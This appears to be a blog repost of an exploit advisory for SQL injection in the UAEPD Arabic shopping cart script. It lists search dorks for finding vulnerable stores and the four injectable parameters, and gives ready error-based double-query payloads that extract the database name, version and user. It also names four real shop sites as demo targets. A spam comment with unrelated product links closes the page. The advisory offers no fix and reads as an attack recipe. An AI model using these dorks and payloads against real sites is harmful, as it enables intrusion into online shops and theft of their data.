UAEPD Shopping Cart Script Sql Injection Vulnerabilty
####################################################################
[~] Script : http://www.uaepd.net/
[~] Dork :
[1] inurl:”products.php?cat_id=” “Powered by: PD ”
[2] inurl:”products.php?p_id” “Powered by: PD ”
[3] inurl:”page.php?id=” “Powered by: PD ”
[4] inurl:”news.php?id=” “Powered by: PD ”
####################################################################
[~] Dork :
[1] inurl:”products.php?cat_id=” “Powered by: PD ”
[2] inurl:”products.php?p_id” “Powered by: PD ”
[3] inurl:”page.php?id=” “Powered by: PD ”
[4] inurl:”news.php?id=” “Powered by: PD ”
####################################################################
[~] INTORUCTION [~]
Uaepd Script is arabic Shopping Cart Script and have many Features.
[~] DESCRIPTION [~]
# Control Panel provides an Arabic or English.
# View the store for the visitor in Arabic and English.
# Possibility to choose one language or operating languages.
# The ability to add unlimited number of pages.
# Format property provides all store pages.
# Add YouTube links and images in all the pages of the store.
# The ability to add sections of main and sub.
# Add an unlimited number of products.
# Add multiple images of the products.
# Availability of property sizes and colors for each product.
# Print logo on the product images automatically.
# Availability of property with a shipping price for each region.
# Buy products shopping cart system.
# You can ask system of members with or without system.
# Three ways to pay:(bank transfer-Receipt & received-Paypal).
# Send an e-mail automatically to any purchase or booking.
# Provide a search feature in the products.
# Availability of the currencies of the property.
# Comprehensive statistics for the purchases and reservations.
# Guestbook available partition.
# Provide property advertising space multiple places.
# Property provides the tape device.
# Offers the possibility to close or open the store.
[~] BUG TYPE [~]
Sql injection (command double query)
[~] BUG [~]
[#] site/products.php?cat_id=[sql injection]
[#] site/products.php?p_id=[sql injection]
[#] site/page.php?id=[sql injection]
[#] site/news.php?id=[sql injection]
[~] EXPLOIT [~]
TO EXTRACT VERSION & NAME & USER DATABASE:
[#] site/products.php?cat_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[#] site/products.php?p_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[#] site/page.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[#] site/news.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[~] DEMOS [~]
[#] http://sedenshop.com/products.php?p_id=3
[#] http://www.henna.ae/products.php?cat_id=1
[#] http://www.shah-een.com/news.php?id=1
[#] http://www.nourita.com/products.php?cat_id=4
./McS
People really need to make sure they follow this advice. This is a great post you shared.
ReplyDeleteAlso Read:
Mosquito Repellents Spray
Mosquito Repellent Agarbatti
Mosquito Repellent Bands